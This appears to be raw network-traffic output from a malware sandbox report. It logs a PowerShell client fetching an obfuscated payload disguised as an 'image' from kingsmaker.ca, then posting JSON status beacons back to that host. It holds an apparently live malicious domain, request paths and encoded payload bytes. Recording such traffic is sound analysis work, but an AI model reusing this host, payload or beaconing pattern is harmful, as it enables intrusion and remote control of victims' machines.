2024-11-29 08:22:20 UTC	1369	IN	Data Raw: 8d a3 22 d2 d2 3b 84 44 4d 00 c1 6c 03 02 82 4d 5d aa 94 54 68 de 68 f5 97 0e aa 5a 43 e6 84 23 d7 21 3c 84 31 a3 92 32 84 88 d8 55 66 e6 68 24 35 c6 9a 25 8d e1 d6 82 b7 16 a1 26 bb 34 00 8e b9 e3 50 a2 46 e7 64 50 ec 04 f1 d1 49 45 d6 fb 36 2c 73 c4 77 53 c4 37 35 a8 b0 00 67 8d 81 7a 36 25 6e 89 63 95 54 c7 2c 0e c0 b3 0d d8 2f d7 aa ce a4 72 17 aa 31 4b 5c b6 02 38 b8 11 d8 7b 90 8e 0c bb 72 1b ac 34 98 55 85 e2 0e d4 67 21 6c ac f2 f5 61 64 53 e0 77 c5 43 b4 0b f9 39 f3 01 fd 07 f4 1f d0 7f 40 ff 03 e8 f7 73 e8 af 31 b9 16 de b6 cb b1 d7 16 20 99 76 63 97 7b e4 5a 2e 9a 71 17 b4 7f d1 9c 20 4d 98 ec f3 8d 96 84 10 51 8b fb 56 95 89 15 9a 73 e0 e7 a5 ec e9 cd fb 76 7c 05 34 ea 3e bb ec f1 db 6e 94 8a 26 e0 86 e0 da 0a 2e 7d 24 7a cf c3 19 72 a3 9a a0 Data Ascii: ";DMlM]ThhZC#!<12Ufh$5%&4PFdPIE6,swS75gz6%ncT,/r1K\8{r4Ug!ladSwC9@s1 vc{Z.q MQVsv\|4>n&.}$zr
2024-11-29 08:22:20 UTC	704	IN	Data Raw: 9f f3 88 8c 6b 08 c3 e7 80 38 df 0c 61 b4 32 fb 2d d3 35 f3 81 31 07 c6 1c 18 73 60 cc 03 8c 99 5b a6 e3 7d c1 e5 f4 ad 6f 27 68 d9 ee 3a 05 86 99 35 5a d5 20 93 da 40 0b ef ec ae e4 ea 4e 44 0e 11 08 fc e1 25 34 0d ad 3a a3 70 b5 35 df 13 bc 16 ce f9 6e b0 5c 6c 6f ea 19 9b 47 5b 51 06 9f de fe db 81 4c 2d b7 72 ad 48 0a ae d8 3a bc fa 86 2d d8 34 06 e7 ad 67 76 68 66 8f 26 2d 7d da 0b d7 a1 9e ef 85 e7 16 e9 e0 6a e4 ea b9 63 da f9 0e c5 d3 fe 5e 81 42 f5 94 18 de 07 08 ad 96 e9 f7 bb c9 56 b0 fd dd a3 21 a2 b5 fa 46 2e 77 a7 69 1f de f1 b1 e7 4c d0 1b ef f1 d8 bc 6e ed fd df e7 59 68 23 10 f6 9b d4 6b e6 43 1b 39 b4 91 43 1b 39 b4 91 b9 36 62 e6 26 f5 48 5f 3d c0 97 b6 74 fc 65 c6 49 54 a8 22 68 8e 68 18 cf 82 14 54 dd 46 23 33 31 bd 23 1a 19 d2 19 95 Data Ascii: k8a2-51s`[}o'h:5Z @ND%4:p5n\loG[QL-rH:-4gvhf&-}jc^BV!F.wiLnYh#kC9C96b&H_=teIT"hhTF#31#
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: 5d d9 3f 4d 96 d2 d9 35 0a 68 a5 a6 0c 9e 77 c6 e1 05 78 ee 3e 17 ff f5 86 c7 61 4f d8 df e9 1c 9d 97 fd c7 2b 18 97 79 c3 54 6e 74 18 02 8a 87 8d d4 75 70 78 0e d8 58 f2 0e 5f 90 d8 f1 55 a2 b6 1f 36 4d 27 e8 bd d7 e3 ad 13 db ec 78 1d d8 a1 17 91 62 f5 1b 0f 5b fe de 39 d6 ed be 16 a8 64 3d 70 ee c0 b9 03 e7 0e 9c 7b 80 73 0f ac aa 58 9d 51 ef 88 55 9d 7d 4c 70 f7 b7 92 ec ec 5b 49 86 a4 53 3a 0a 52 25 b4 82 5f b9 23 f9 ad 57 ed de 5b 5f db 85 2f e3 31 a7 c5 59 da 82 30 bf 5c 6c f4 f4 5b 02 fd e5 84 83 db b4 b7 54 2e c0 f0 fe 5b 05 77 08 f4 7f 97 6f 25 e7 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 31 37 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 41 20 31 0a 2f 63 61 20 31 0a 2f 4c 43 20 30 0a 2f 4c 4a 20 30 0a 2f 4c 57 20 31 0a 2f 4d 4c 20 34 0a Data Ascii: ]?M5hwx>aO+yTntupxX_U6M'xb[9d=p{sXQU}Lp[IS:R%_#W[_/1Y0\l[T.[wo%endstreamendobj17 0 obj<</CA 1/ca 1/LC 0/LJ 0/LW 1/ML 4
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: d5 72 54 e9 33 c0 85 aa 77 a4 a6 c6 5e d3 d3 16 83 a8 a6 3b 58 b4 bb 58 94 e7 a4 97 a4 ab c8 5a d4 d3 c1 b6 b6 c4 a2 d0 f1 a0 27 c4 f1 94 da a2 95 46 91 b4 67 84 40 51 34 eb 3d 95 b1 87 36 2e 89 2e da 42 a4 5f ec a1 3e 1f 0f 35 ed f9 f3 a9 88 d9 e4 e7 a3 67 24 1b d2 b8 a6 5e ec 8d 76 fa 5e 54 56 3d 2a f5 5d 4e c5 1e b3 1a 9b c7 45 ba a7 cb fa b1 c7 ad 4b 51 1b cb 83 89 81 ae 4a b3 c2 eb 45 4a 7e a4 0f e5 8a 3e a2 9c d3 da 4c fe 5b e5 19 3f 47 d9 a7 dd e0 90 4d 51 64 99 09 5b e0 3e 08 6e c0 58 d9 f6 9d 28 d5 c4 79 d2 aa ab dc 66 4f 8c 12 2f 9a 8b c6 dc 34 7a ba 08 09 8e ec 41 06 b5 17 35 39 77 08 61 d6 3d da 5a c5 85 72 00 b7 ba b4 13 82 9b 34 70 bf c1 87 5d 06 6f 54 3c b8 10 63 58 60 b3 3a c3 a5 1a bc 6b 1b d9 8d 5b 33 0a e0 0e a7 bf 47 08 20 be 9a 14 8a Data Ascii: rT3w^;XXZ'Fg@Q4=6..B_>5g$^v^TV=*]NEKQJEJ~>L[?GMQd[>nX(yfO/4zA59wa=Zr4p]oT<cX`:k[3G
2024-11-29 08:22:20 UTC	1369	IN	Data Raw: 80 a6 5c 9c ae 19 df a5 14 3e a6 e5 7b 64 d6 98 a9 87 ab 5a 2d 4b 28 4d a3 10 67 a8 0f 9f 3d a0 cd 5c 4e a4 d2 76 68 07 ba f9 61 6d 19 ed d5 e8 9c f6 d7 3d 61 3c 6c b8 f1 23 88 3f 82 f8 23 88 3f 82 78 da 43 61 23 88 bb 96 8c ba 0e d0 ad 02 b1 ef f6 ca 6c 66 39 08 dc 56 73 e3 7c 8e 05 75 05 2d 72 4b e8 43 56 dc 55 25 2d 7e ea 2e 64 f5 c9 41 2c b0 ae 96 ad d7 0a ac 0b e1 b2 25 72 36 ee 72 a4 28 53 e7 dd 42 06 2b 91 85 26 d0 31 62 cd 22 d7 16 cf 34 12 95 a4 50 83 0d a3 fa 91 52 83 b0 ed 80 5b 11 a2 eb 37 65 8d 03 b7 de 08 dc c1 d7 54 cb 0c 20 d5 9a 34 d4 7c d3 a9 43 93 58 07 20 6a 6b 88 88 94 85 49 99 b8 05 78 72 dd e5 2a f8 cf 2f a1 cd 83 7e 2d 29 1f 91 4e 9d b7 a1 a8 51 70 97 e8 e9 db 01 be 3d fc 08 f2 8f 20 ff 08 f2 8f 20 bf 19 e4 cd 38 c8 07 29 ae 0b d6 Data Ascii: \>{dZ-K(Mg=\Nvham=a<l#?#?xCa#lf9Vs\|u-rKCVU%-~.dA,%r6r(SB+&1b"4PR[7eT 4\|CX jkIxr*/~-)NQp= 8)

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:24 UTC	388	OUT	GET /file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Connection: Keep-Alive
2024-11-29 08:22:24 UTC	1109	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:24 GMT Content-Type: application/octet-stream Content-Length: 12118 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKY36DSMSFzXvkxNxbejynwa%2FblfspINLGI3aj57C6t61ZA3aKgzKeX9E1JcEPrpM9f52tpEG5QGgNpbWKynlEJ7YUh7ooqFaW0kK%2Fcvny4IU8NeqjNLa5kZnCJgqjG%2B2ZOWsFZRpEU2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17145&min_rtt=1009&rtt_var=25449&sent=64&recv=69&lost=0&retrans=0&sent_bytes=38508&recv_bytes=36782&delivery_rate=16021947&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea130929b400ad7-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158485&min_rtt=158366&rtt_var=33590&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1002&delivery_rate=24129&cwnd=252&unsent_bytes=0&cid=1fe7cddbe4886d18&ts=665&x=0"
2024-11-29 08:22:24 UTC	260	IN	Data Raw: 25 72 67 78 6e 60 72 62 69 73 75 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 31 47 6f 52 54 4f 52 4c 6d 6d 59 64 45 47 60 54 31 44 34 52 54 4f 4a 60 46 4f 48 50 6f 4f 69 57 31 34 6e 5b 44 65 72 65 6c 4b 71 4e 59 47 6b 4c 6b 6d 30 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 59 53 6c 75 60 56 44 71 37 57 32 6d 52 62 6d 71 58 63 46 53 4b 53 45 43 6f 52 6a 69 60 60 46 4b 48 57 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 47 6b 63 56 75 6f 54 47 4f 43 60 56 47 48 54 6b 43 6b 52 44 31 33 55 49 6a 34 62 6c 47 59 4f 56 34 6b 4c 6b 47 6e 58 55 4b Data Ascii: %rgxn`rbisu<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#P1GoRTORLmmYdEG`T1D4RTOJ`FOHPoOiW14n[DerelKqNYGkLkm0RVq{UjOoLDuKP1GoRTORc0qYSlu`VDq7W2mRbmqXcFSKSECoRji``FKHWlyQe{CMRTOC[1mETkGkcVuoTGOC`VGHTkCkRD13UIj4blGYOV4kLkGnXUK
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 55 6c 69 4c 64 6d 4b 70 56 56 30 53 4c 6a 30 37 5b 46 69 4f 57 46 69 70 56 57 53 6b 4c 31 30 44 60 46 79 51 53 44 30 35 56 57 65 47 65 31 38 49 53 6c 6d 4f 57 44 4b 6e 55 57 53 53 65 30 71 54 54 59 65 4f 4c 6d 54 78 56 6c 30 46 60 31 34 54 50 55 47 4e 57 46 72 78 56 6d 53 57 64 54 30 75 52 6c 75 4e 53 47 6a 76 56 57 53 57 4f 57 6d 70 54 6c 6d 4e 60 6d 6a 76 55 6d 65 47 4c 54 31 78 54 55 47 51 57 47 47 37 55 6a 65 4e 63 44 30 37 54 6c 79 60 53 31 6a 30 56 57 53 6f 64 6d 6d 37 5b 46 30 4f 57 47 71 6e 56 6c 71 73 4f 44 30 45 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 33 47 59 56 56 38 4a 53 33 53 7b 58 6b 4b 4a 60 46 4b 44 62 47 43 56 4c 54 34 56 54 57 5b 4a 52 30 57 72 56 6d 47 4c 63 59 69 72 58 6c 30 6a 4c 46 47 45 50 59 53 60 4c 30 47 6f 55 54 4f 73 55 6a 4f Data Ascii: UliLdmKpVV0SLj07[FiOWFipVWSkL10D`FyQSD05VWeGe18ISlmOWDKnUWSSe0qTTYeOLmTxVl0F`14TPUGNWFrxVmSWdT0uRluNSGjvVWSWOWmpTlmN`mjvUmeGLT1xTUGQWGG7UjeNcD07Tly`S1j0VWSodmm7[F0OWGqnVlqsOD0ERUeDTV8oRTOC[3GYVV8JS3S{XkKJ`FKDbGCVLT4VTW[JR0WrVmGLcYirXl0jLFGEPYS`L0GoUTOsUjO
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 54 57 31 58 57 65 47 65 44 71 55 57 6c 69 69 54 31 57 32 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 33 50 7b 52 6f 43 6a 53 30 57 31 58 54 62 34 64 6c 53 45 50 56 6d 5b 4c 6f 69 72 56 57 69 4b 5b 33 4b 49 4e 56 34 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 6b 4b 35 65 6d 6d 75 53 6f 4f 51 60 7b 6d 58 57 55 47 56 50 6d 57 73 62 47 4f 56 63 44 47 6f 54 47 4f 42 50 54 75 45 60 7b 65 44 54 56 38 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 54 34 45 63 6b 43 4e 50 33 30 60 4c 56 4b 75 55 6b 43 69 57 7b 6d 30 52 54 57 4e 64 57 71 59 53 6b 43 60 54 7b 47 46 58 6d 69 42 4c 46 57 56 54 6c 79 68 56 44 4b 57 56 6d 69 6e 4c 47 4b 75 63 49 4f 60 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 6b 53 31 5b 34 Data Ascii: TW1XWeGeDqUWliiT1W2O1SSc3eKP1GoRTOC[3P{RoCjS0W1XTb4dlSEPVm[LoirVWiK[3KINV4K`oONP3mC[1mEPVeKP1GsVkK5emmuSoOQ`{mXWUGVPmWsbGOVcDGoTGOBPTuE`{eDTV8oRTOC[3[SLDuDTV8NP3mC[1mEPT4EckCNP30`LVKuUkCiW{m0RTWNdWqYSkC`T{GFXmiBLFWVTlyhVDKWVminLGKucIO`T1H2SGGw[1mEPVekS1[4
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 65 52 53 30 5b 75 56 6d 62 30 60 30 71 58 52 56 65 69 56 44 30 6f 58 57 62 30 64 6c 53 49 53 6f 4f 68 53 30 5b 73 52 54 65 46 65 57 71 45 50 6c 79 68 63 54 5b 71 58 6a 65 56 60 31 53 53 63 33 75 6a 4c 6c 79 30 56 6a 62 34 4c 33 4c 76 54 6c 79 60 63 57 5b 30 56 6a 65 56 64 54 6d 44 4c 46 65 52 4c 6d 58 76 55 47 5b 6a 65 46 47 57 4e 56 6d 69 63 57 5b 70 5b 44 4f 43 65 47 53 75 53 6f 53 60 56 44 34 32 56 57 65 4e 63 44 6d 45 52 6d 4f 68 4c 6b 6a 76 56 44 5b 4e 63 47 6a 7b 57 6f 6d 69 56 47 48 30 54 55 4b 56 65 56 53 49 57 6f 6d 4f 60 54 6d 6f 55 47 57 4e 62 30 6d 58 55 6f 71 4b 50 31 71 42 58 6c 34 52 62 46 53 75 63 49 6d 6a 56 44 34 53 58 33 31 34 60 33 53 59 55 6b 43 4b 60 54 48 35 52 54 5b 6a 63 30 71 58 52 6c 79 4c 57 55 6d 71 58 56 30 56 60 6c 53 45 50 Data Ascii: eRS0[uVmb0`0qXRVeiVD0oXWb0dlSISoOhS0[sRTeFeWqEPlyhcT[qXjeV`1SSc3ujLly0Vjb4L3LvTly`cW[0VjeVdTmDLFeRLmXvUG[jeFGWNVmicW[p[DOCeGSuSoS`VD42VWeNcDmERmOhLkjvVD[NcGj{WomiVGH0TUKVeVSIWomO`TmoUGWNb0mXUoqKP1qBXl4RbFSucImjVD4SX314`3SYUkCK`TH5RT[jc0qXRlyLWUmqXV0V`lSEP
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 79 63 46 53 49 57 6f 6d 4d 53 55 47 6e 58 6c 30 52 60 46 53 49 4e 59 6d 6d 57 45 43 73 5b 44 69 4a 4c 57 71 55 63 46 53 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4a 53 56 79 30 58 31 69 56 4c 47 4b 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 31 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 54 4b 6e 58 33 30 46 65 47 71 58 54 6c 79 6b 60 56 69 4e 56 57 62 30 60 30 6d 58 54 6f 5b 6b 63 6c 72 34 52 6a 69 52 64 56 53 59 57 59 43 58 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 4b 50 5b 47 69 52 65 33 53 58 54 6a 65 69 57 32 69 72 57 54 65 46 4c 46 47 45 65 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 56 56 Data Ascii: ycFSIWomMSUGnXl0R`FSINYmmWECs[DiJLWqUcFSDTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJSVy0X1iVLGKucIO`WjKn[Deob1SSc14E`TGoRTOC[1mEPVeYLTKnX30FeGqXTlyk`ViNVWb0`0mXTo[kclr4RjiRdVSYWYCXTUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0KP[GiRe3SXTjeiW2irWTeFLFGEe14E[{CMRTOC[1mEPVeKP1KhVV
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 57 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 33 79 76 53 30 58 76 4f 54 65 55 4c 54 71 49 57 6a 4f 43 60 57 4b 58 52 6f 6d 68 4c 31 6d 6f 58 31 69 4a 65 6d 6a 78 57 6f 71 6b 64 54 6d 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 58 33 30 56 4c 46 53 58 52 6f 57 4b 50 30 4b 75 56 57 65 35 64 6d 71 53 4c 44 75 4b 50 31 47 6f 52 54 66 76 55 6a 4f 74 4c 44 34 45 5b 7b 43 4d 53 47 47 76 63 56 53 59 4f 56 71 6a 53 33 79 33 58 6c 6d 42 53 56 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4c 79 53 33 47 59 64 46 79 56 4c 6c 76 76 58 54 5b 4a 63 46 53 48 52 6b 57 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 6f 65 5b 56 44 71 6e 58 6d 4f 43 63 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 65 49 71 6a 52 44 71 76 58 6c 30 6a 5b 44 71 48 57 6f 6d Data Ascii: WIONP3mC[1mEPVeKP1GoW3yvS0XvOTeULTqIWjOC`WKXRomhL1moX1iJemjxWoqkdTmNP3mC[1mEPVeKP1GoX30VLFSXRoWKP0KuVWe5dmqSLDuKP1GoRTfvUjOtLD4E[{CMSGGvcVSYOVqjS3y3XlmBSVH{[IWhS{mnVjLyS3GYdFyVLlvvXT[JcFSHRkWKRIONP3mC[1mEPoe[VDqnXmOCc1SSc3eKP1GoRTOC[1mFeIqjRDqvXl0j[DqHWom
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 6c 4b 71 4f 46 65 52 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 56 65 5b 4c 6a 5b 30 56 55 4b 56 62 30 71 59 54 59 57 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 4f 75 57 6b 43 6a 56 44 71 30 52 54 4f 52 4c 46 4f 74 57 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 4c 44 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 4f 5b 30 4f 59 4f 55 4b 68 4c 6f 53 72 55 47 5b 6a 63 47 6d 72 52 6c 79 6b 56 47 5b 72 58 7b 4f 53 Data Ascii: lKqOFeRS{j{Xl05emmYTVe[Lj[0VUKVb0qYTYWK`oONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1GoRTOC[3OuWkCjVDq0RTORLFOtWlyQe{CMRTOC[1mEPVeKP1GoRTOC[1mEPVeKRECNP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1GNP3mC[1mEPVeKP1GoRTOC[1mHLD4E`TGoRTOC[1mEPVeKP1GoRTOO[0OYOUKhLoSrUG[jcGmrRlykVG[rX{OS
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 57 6a 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 54 31 65 46 65 57 71 49 64 46 79 4b 53 33 79 30 5b 44 65 56 64 56 4b 75 57 6b 43 4b 53 30 5b 34 58 33 31 34 64 56 4f 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 33 79 76 53 30 58 76 4f 54 65 55 4c 54 71 49 57 6a 4f 43 60 57 4f 59 4f 55 43 60 56 44 71 30 56 6d 69 53 5b 30 71 58 52 6f 6d 68 4c 31 6a 33 52 54 4f 53 63 31 71 46 4e 49 57 52 56 46 69 70 56 6d 69 42 4c 46 47 59 4e 59 57 4c 60 7b 47 72 58 7b 4f 4e 60 47 6e 78 57 59 43 4b 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 4e 60 46 53 49 55 6c 38 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 Data Ascii: WjRTi{UjOqPVeKP1GoRTOC[1mEPVeKP10oT1eFeWqIdFyKS3y0[DeVdVKuWkCKS0[4X314dVO2LDuKP1GoRTOC[1mEPVeKP1GoW3yvS0XvOTeULTqIWjOC`WOYOUC`VDq0VmiS[0qXRomhL1j3RTOSc1qFNIWRVFipVmiBLFGYNYWL`{GrX{ON`GnxWYCK[{CMRTOC[1mEPVeKP1H4SGGw[1mEPVeKP1GoRTeN`FSIUl8KRIONP3mC[1mEPVeKP
2024-11-29 08:22:24 UTC	1369	IN	Data Raw: 78 57 6c 71 68 4c 6b 57 73 58 32 6d 43 64 44 30 44 62 31 34 45 63 49 43 69 54 6c 79 6a 55 30 4b 73 65 47 4f 52 63 47 47 6f 52 56 75 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 52 54 65 4a 65 6c 53 45 52 55 65 44 54 59 43 47 58 6b 4f 6a 65 56 4b 49 4e 56 69 60 50 7b 47 49 58 57 65 35 63 47 58 78 63 45 43 69 53 6a 71 72 5b 44 69 4a 4f 54 6d 45 4c 55 47 6b 63 59 65 6f 52 56 30 6e 4c 46 53 48 50 6f 71 51 60 55 69 33 58 55 4b 72 65 57 6e 7b 55 6f 53 5b 57 32 53 72 58 33 6a 30 60 6d 6d 55 4e 56 30 69 57 32 69 72 55 56 6a 35 64 6a 30 49 52 6c 6d 4e 53 46 75 34 56 6d 65 4f 4f 44 34 37 5b 7b 57 51 57 31 57 34 56 56 71 52 60 44 38 49 56 6c 69 4e 57 31 31 30 56 6d 65 56 63 47 6d 37 54 55 4b 51 57 47 54 7b 55 6d 53 57 64 6d 71 75 54 55 43 5b 4c 6a 34 75 56 56 71 4b 64 6a Data Ascii: xWlqhLkWsX2mCdD0Db14EcICiTlyjU0KseGORcGGoRVuRelPxOYOhLj[sRTeJelSERUeDTYCGXkOjeVKINVi`P{GIXWe5cGXxcECiSjqr[DiJOTmELUGkcYeoRV0nLFSHPoqQ`Ui3XUKreWn{UoS[W2SrX3j0`mmUNV0iW2irUVj5dj0IRlmNSFu4VmeOOD47[{WQW1W4VVqR`D8IVliNW110VmeVcGm7TUKQWGT{UmSWdmquTUC[Lj4uVVqKdj
2024-11-29 08:22:24 UTC	906	IN	Data Raw: 56 55 4b 6e 63 47 71 48 57 6f 4f 60 57 30 4b 57 56 57 69 4e 62 6a 6d 45 4c 54 4b 5b 4c 30 4b 76 58 6b 48 31 5b 31 71 49 53 6c 71 6a 53 33 79 33 58 6c 6d 43 65 47 57 48 52 6f 43 68 63 54 34 76 58 31 65 46 62 31 6d 45 54 6f 65 6b 63 56 79 30 56 55 4b 72 65 30 6d 59 65 33 65 4c 57 6d 4b 34 58 57 65 6a 63 6d 71 58 52 56 65 4a 52 47 4b 34 58 57 65 6a 63 6d 71 58 52 56 65 4c 57 6a 34 72 5b 44 69 52 62 46 4b 75 5b 49 71 4b 50 30 4b 37 56 6d 69 52 4c 46 47 59 4f 56 34 6b 64 54 47 31 57 6a 65 46 64 6c 44 76 4f 56 69 68 57 30 57 6f 52 56 34 76 57 47 71 58 52 6b 4b 69 57 31 34 72 56 55 4b 46 62 6c 48 78 60 7b 4f 4b 60 54 47 31 54 6a 65 56 64 6d 6a 7b 52 6f 43 6b 52 47 4b 76 58 6b 48 31 5b 31 6d 72 5b 49 43 68 63 57 4b 33 5b 45 4f 4f 5b 33 47 49 57 6f 4f 6b 53 30 5b Data Ascii: VUKncGqHWoO`W0KWVWiNbjmELTK[L0KvXkH1[1qISlqjS3y3XlmCeGWHRoChcT4vX1eFb1mEToekcVy0VUKre0mYe3eLWmK4XWejcmqXRVeJRGK4XWejcmqXRVeLWj4r[DiRbFKu[IqKP0K7VmiRLFGYOV4kdTG1WjeFdlDvOVihW0WoRV4vWGqXRkKiW14rVUKFblHx`{OK`TG1TjeVdmj{RoCkRGKvXkH1[1mr[IChcWK3[EOO[3GIWoOkS0[

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:25 UTC	284	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 140
2024-11-29 08:22:25 UTC	140	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 41 72 74 68 75 72 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
2024-11-29 08:22:25 UTC	993	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:22:25 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FobFL1BDn40Uo1wtjNLQ3VnZ4HkvQKdx0RpXBcbZGJdpBxPsUfNHTogw%2FVzsPocYy7Q%2FJrqwP1WRzENAWUBpQMoV7dCShw5rbVyArZWtD09josxFnU4twsT4nFhrX8%2BsJHgF%2Fh20O32n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8730&min_rtt=1009&rtt_var=12771&sent=75&recv=77&lost=0&retrans=0&sent_bytes=51499&recv_bytes=37708&delivery_rate=16021947&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea13099be120acf-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158536&min_rtt=158435&rtt_var=33581&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1084&delivery_rate=24121&cwnd=252&unsent_bytes=0&cid=8157ed8323e335fb&ts=660&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:22:37 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce34edb9a83c7f16af980 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 69
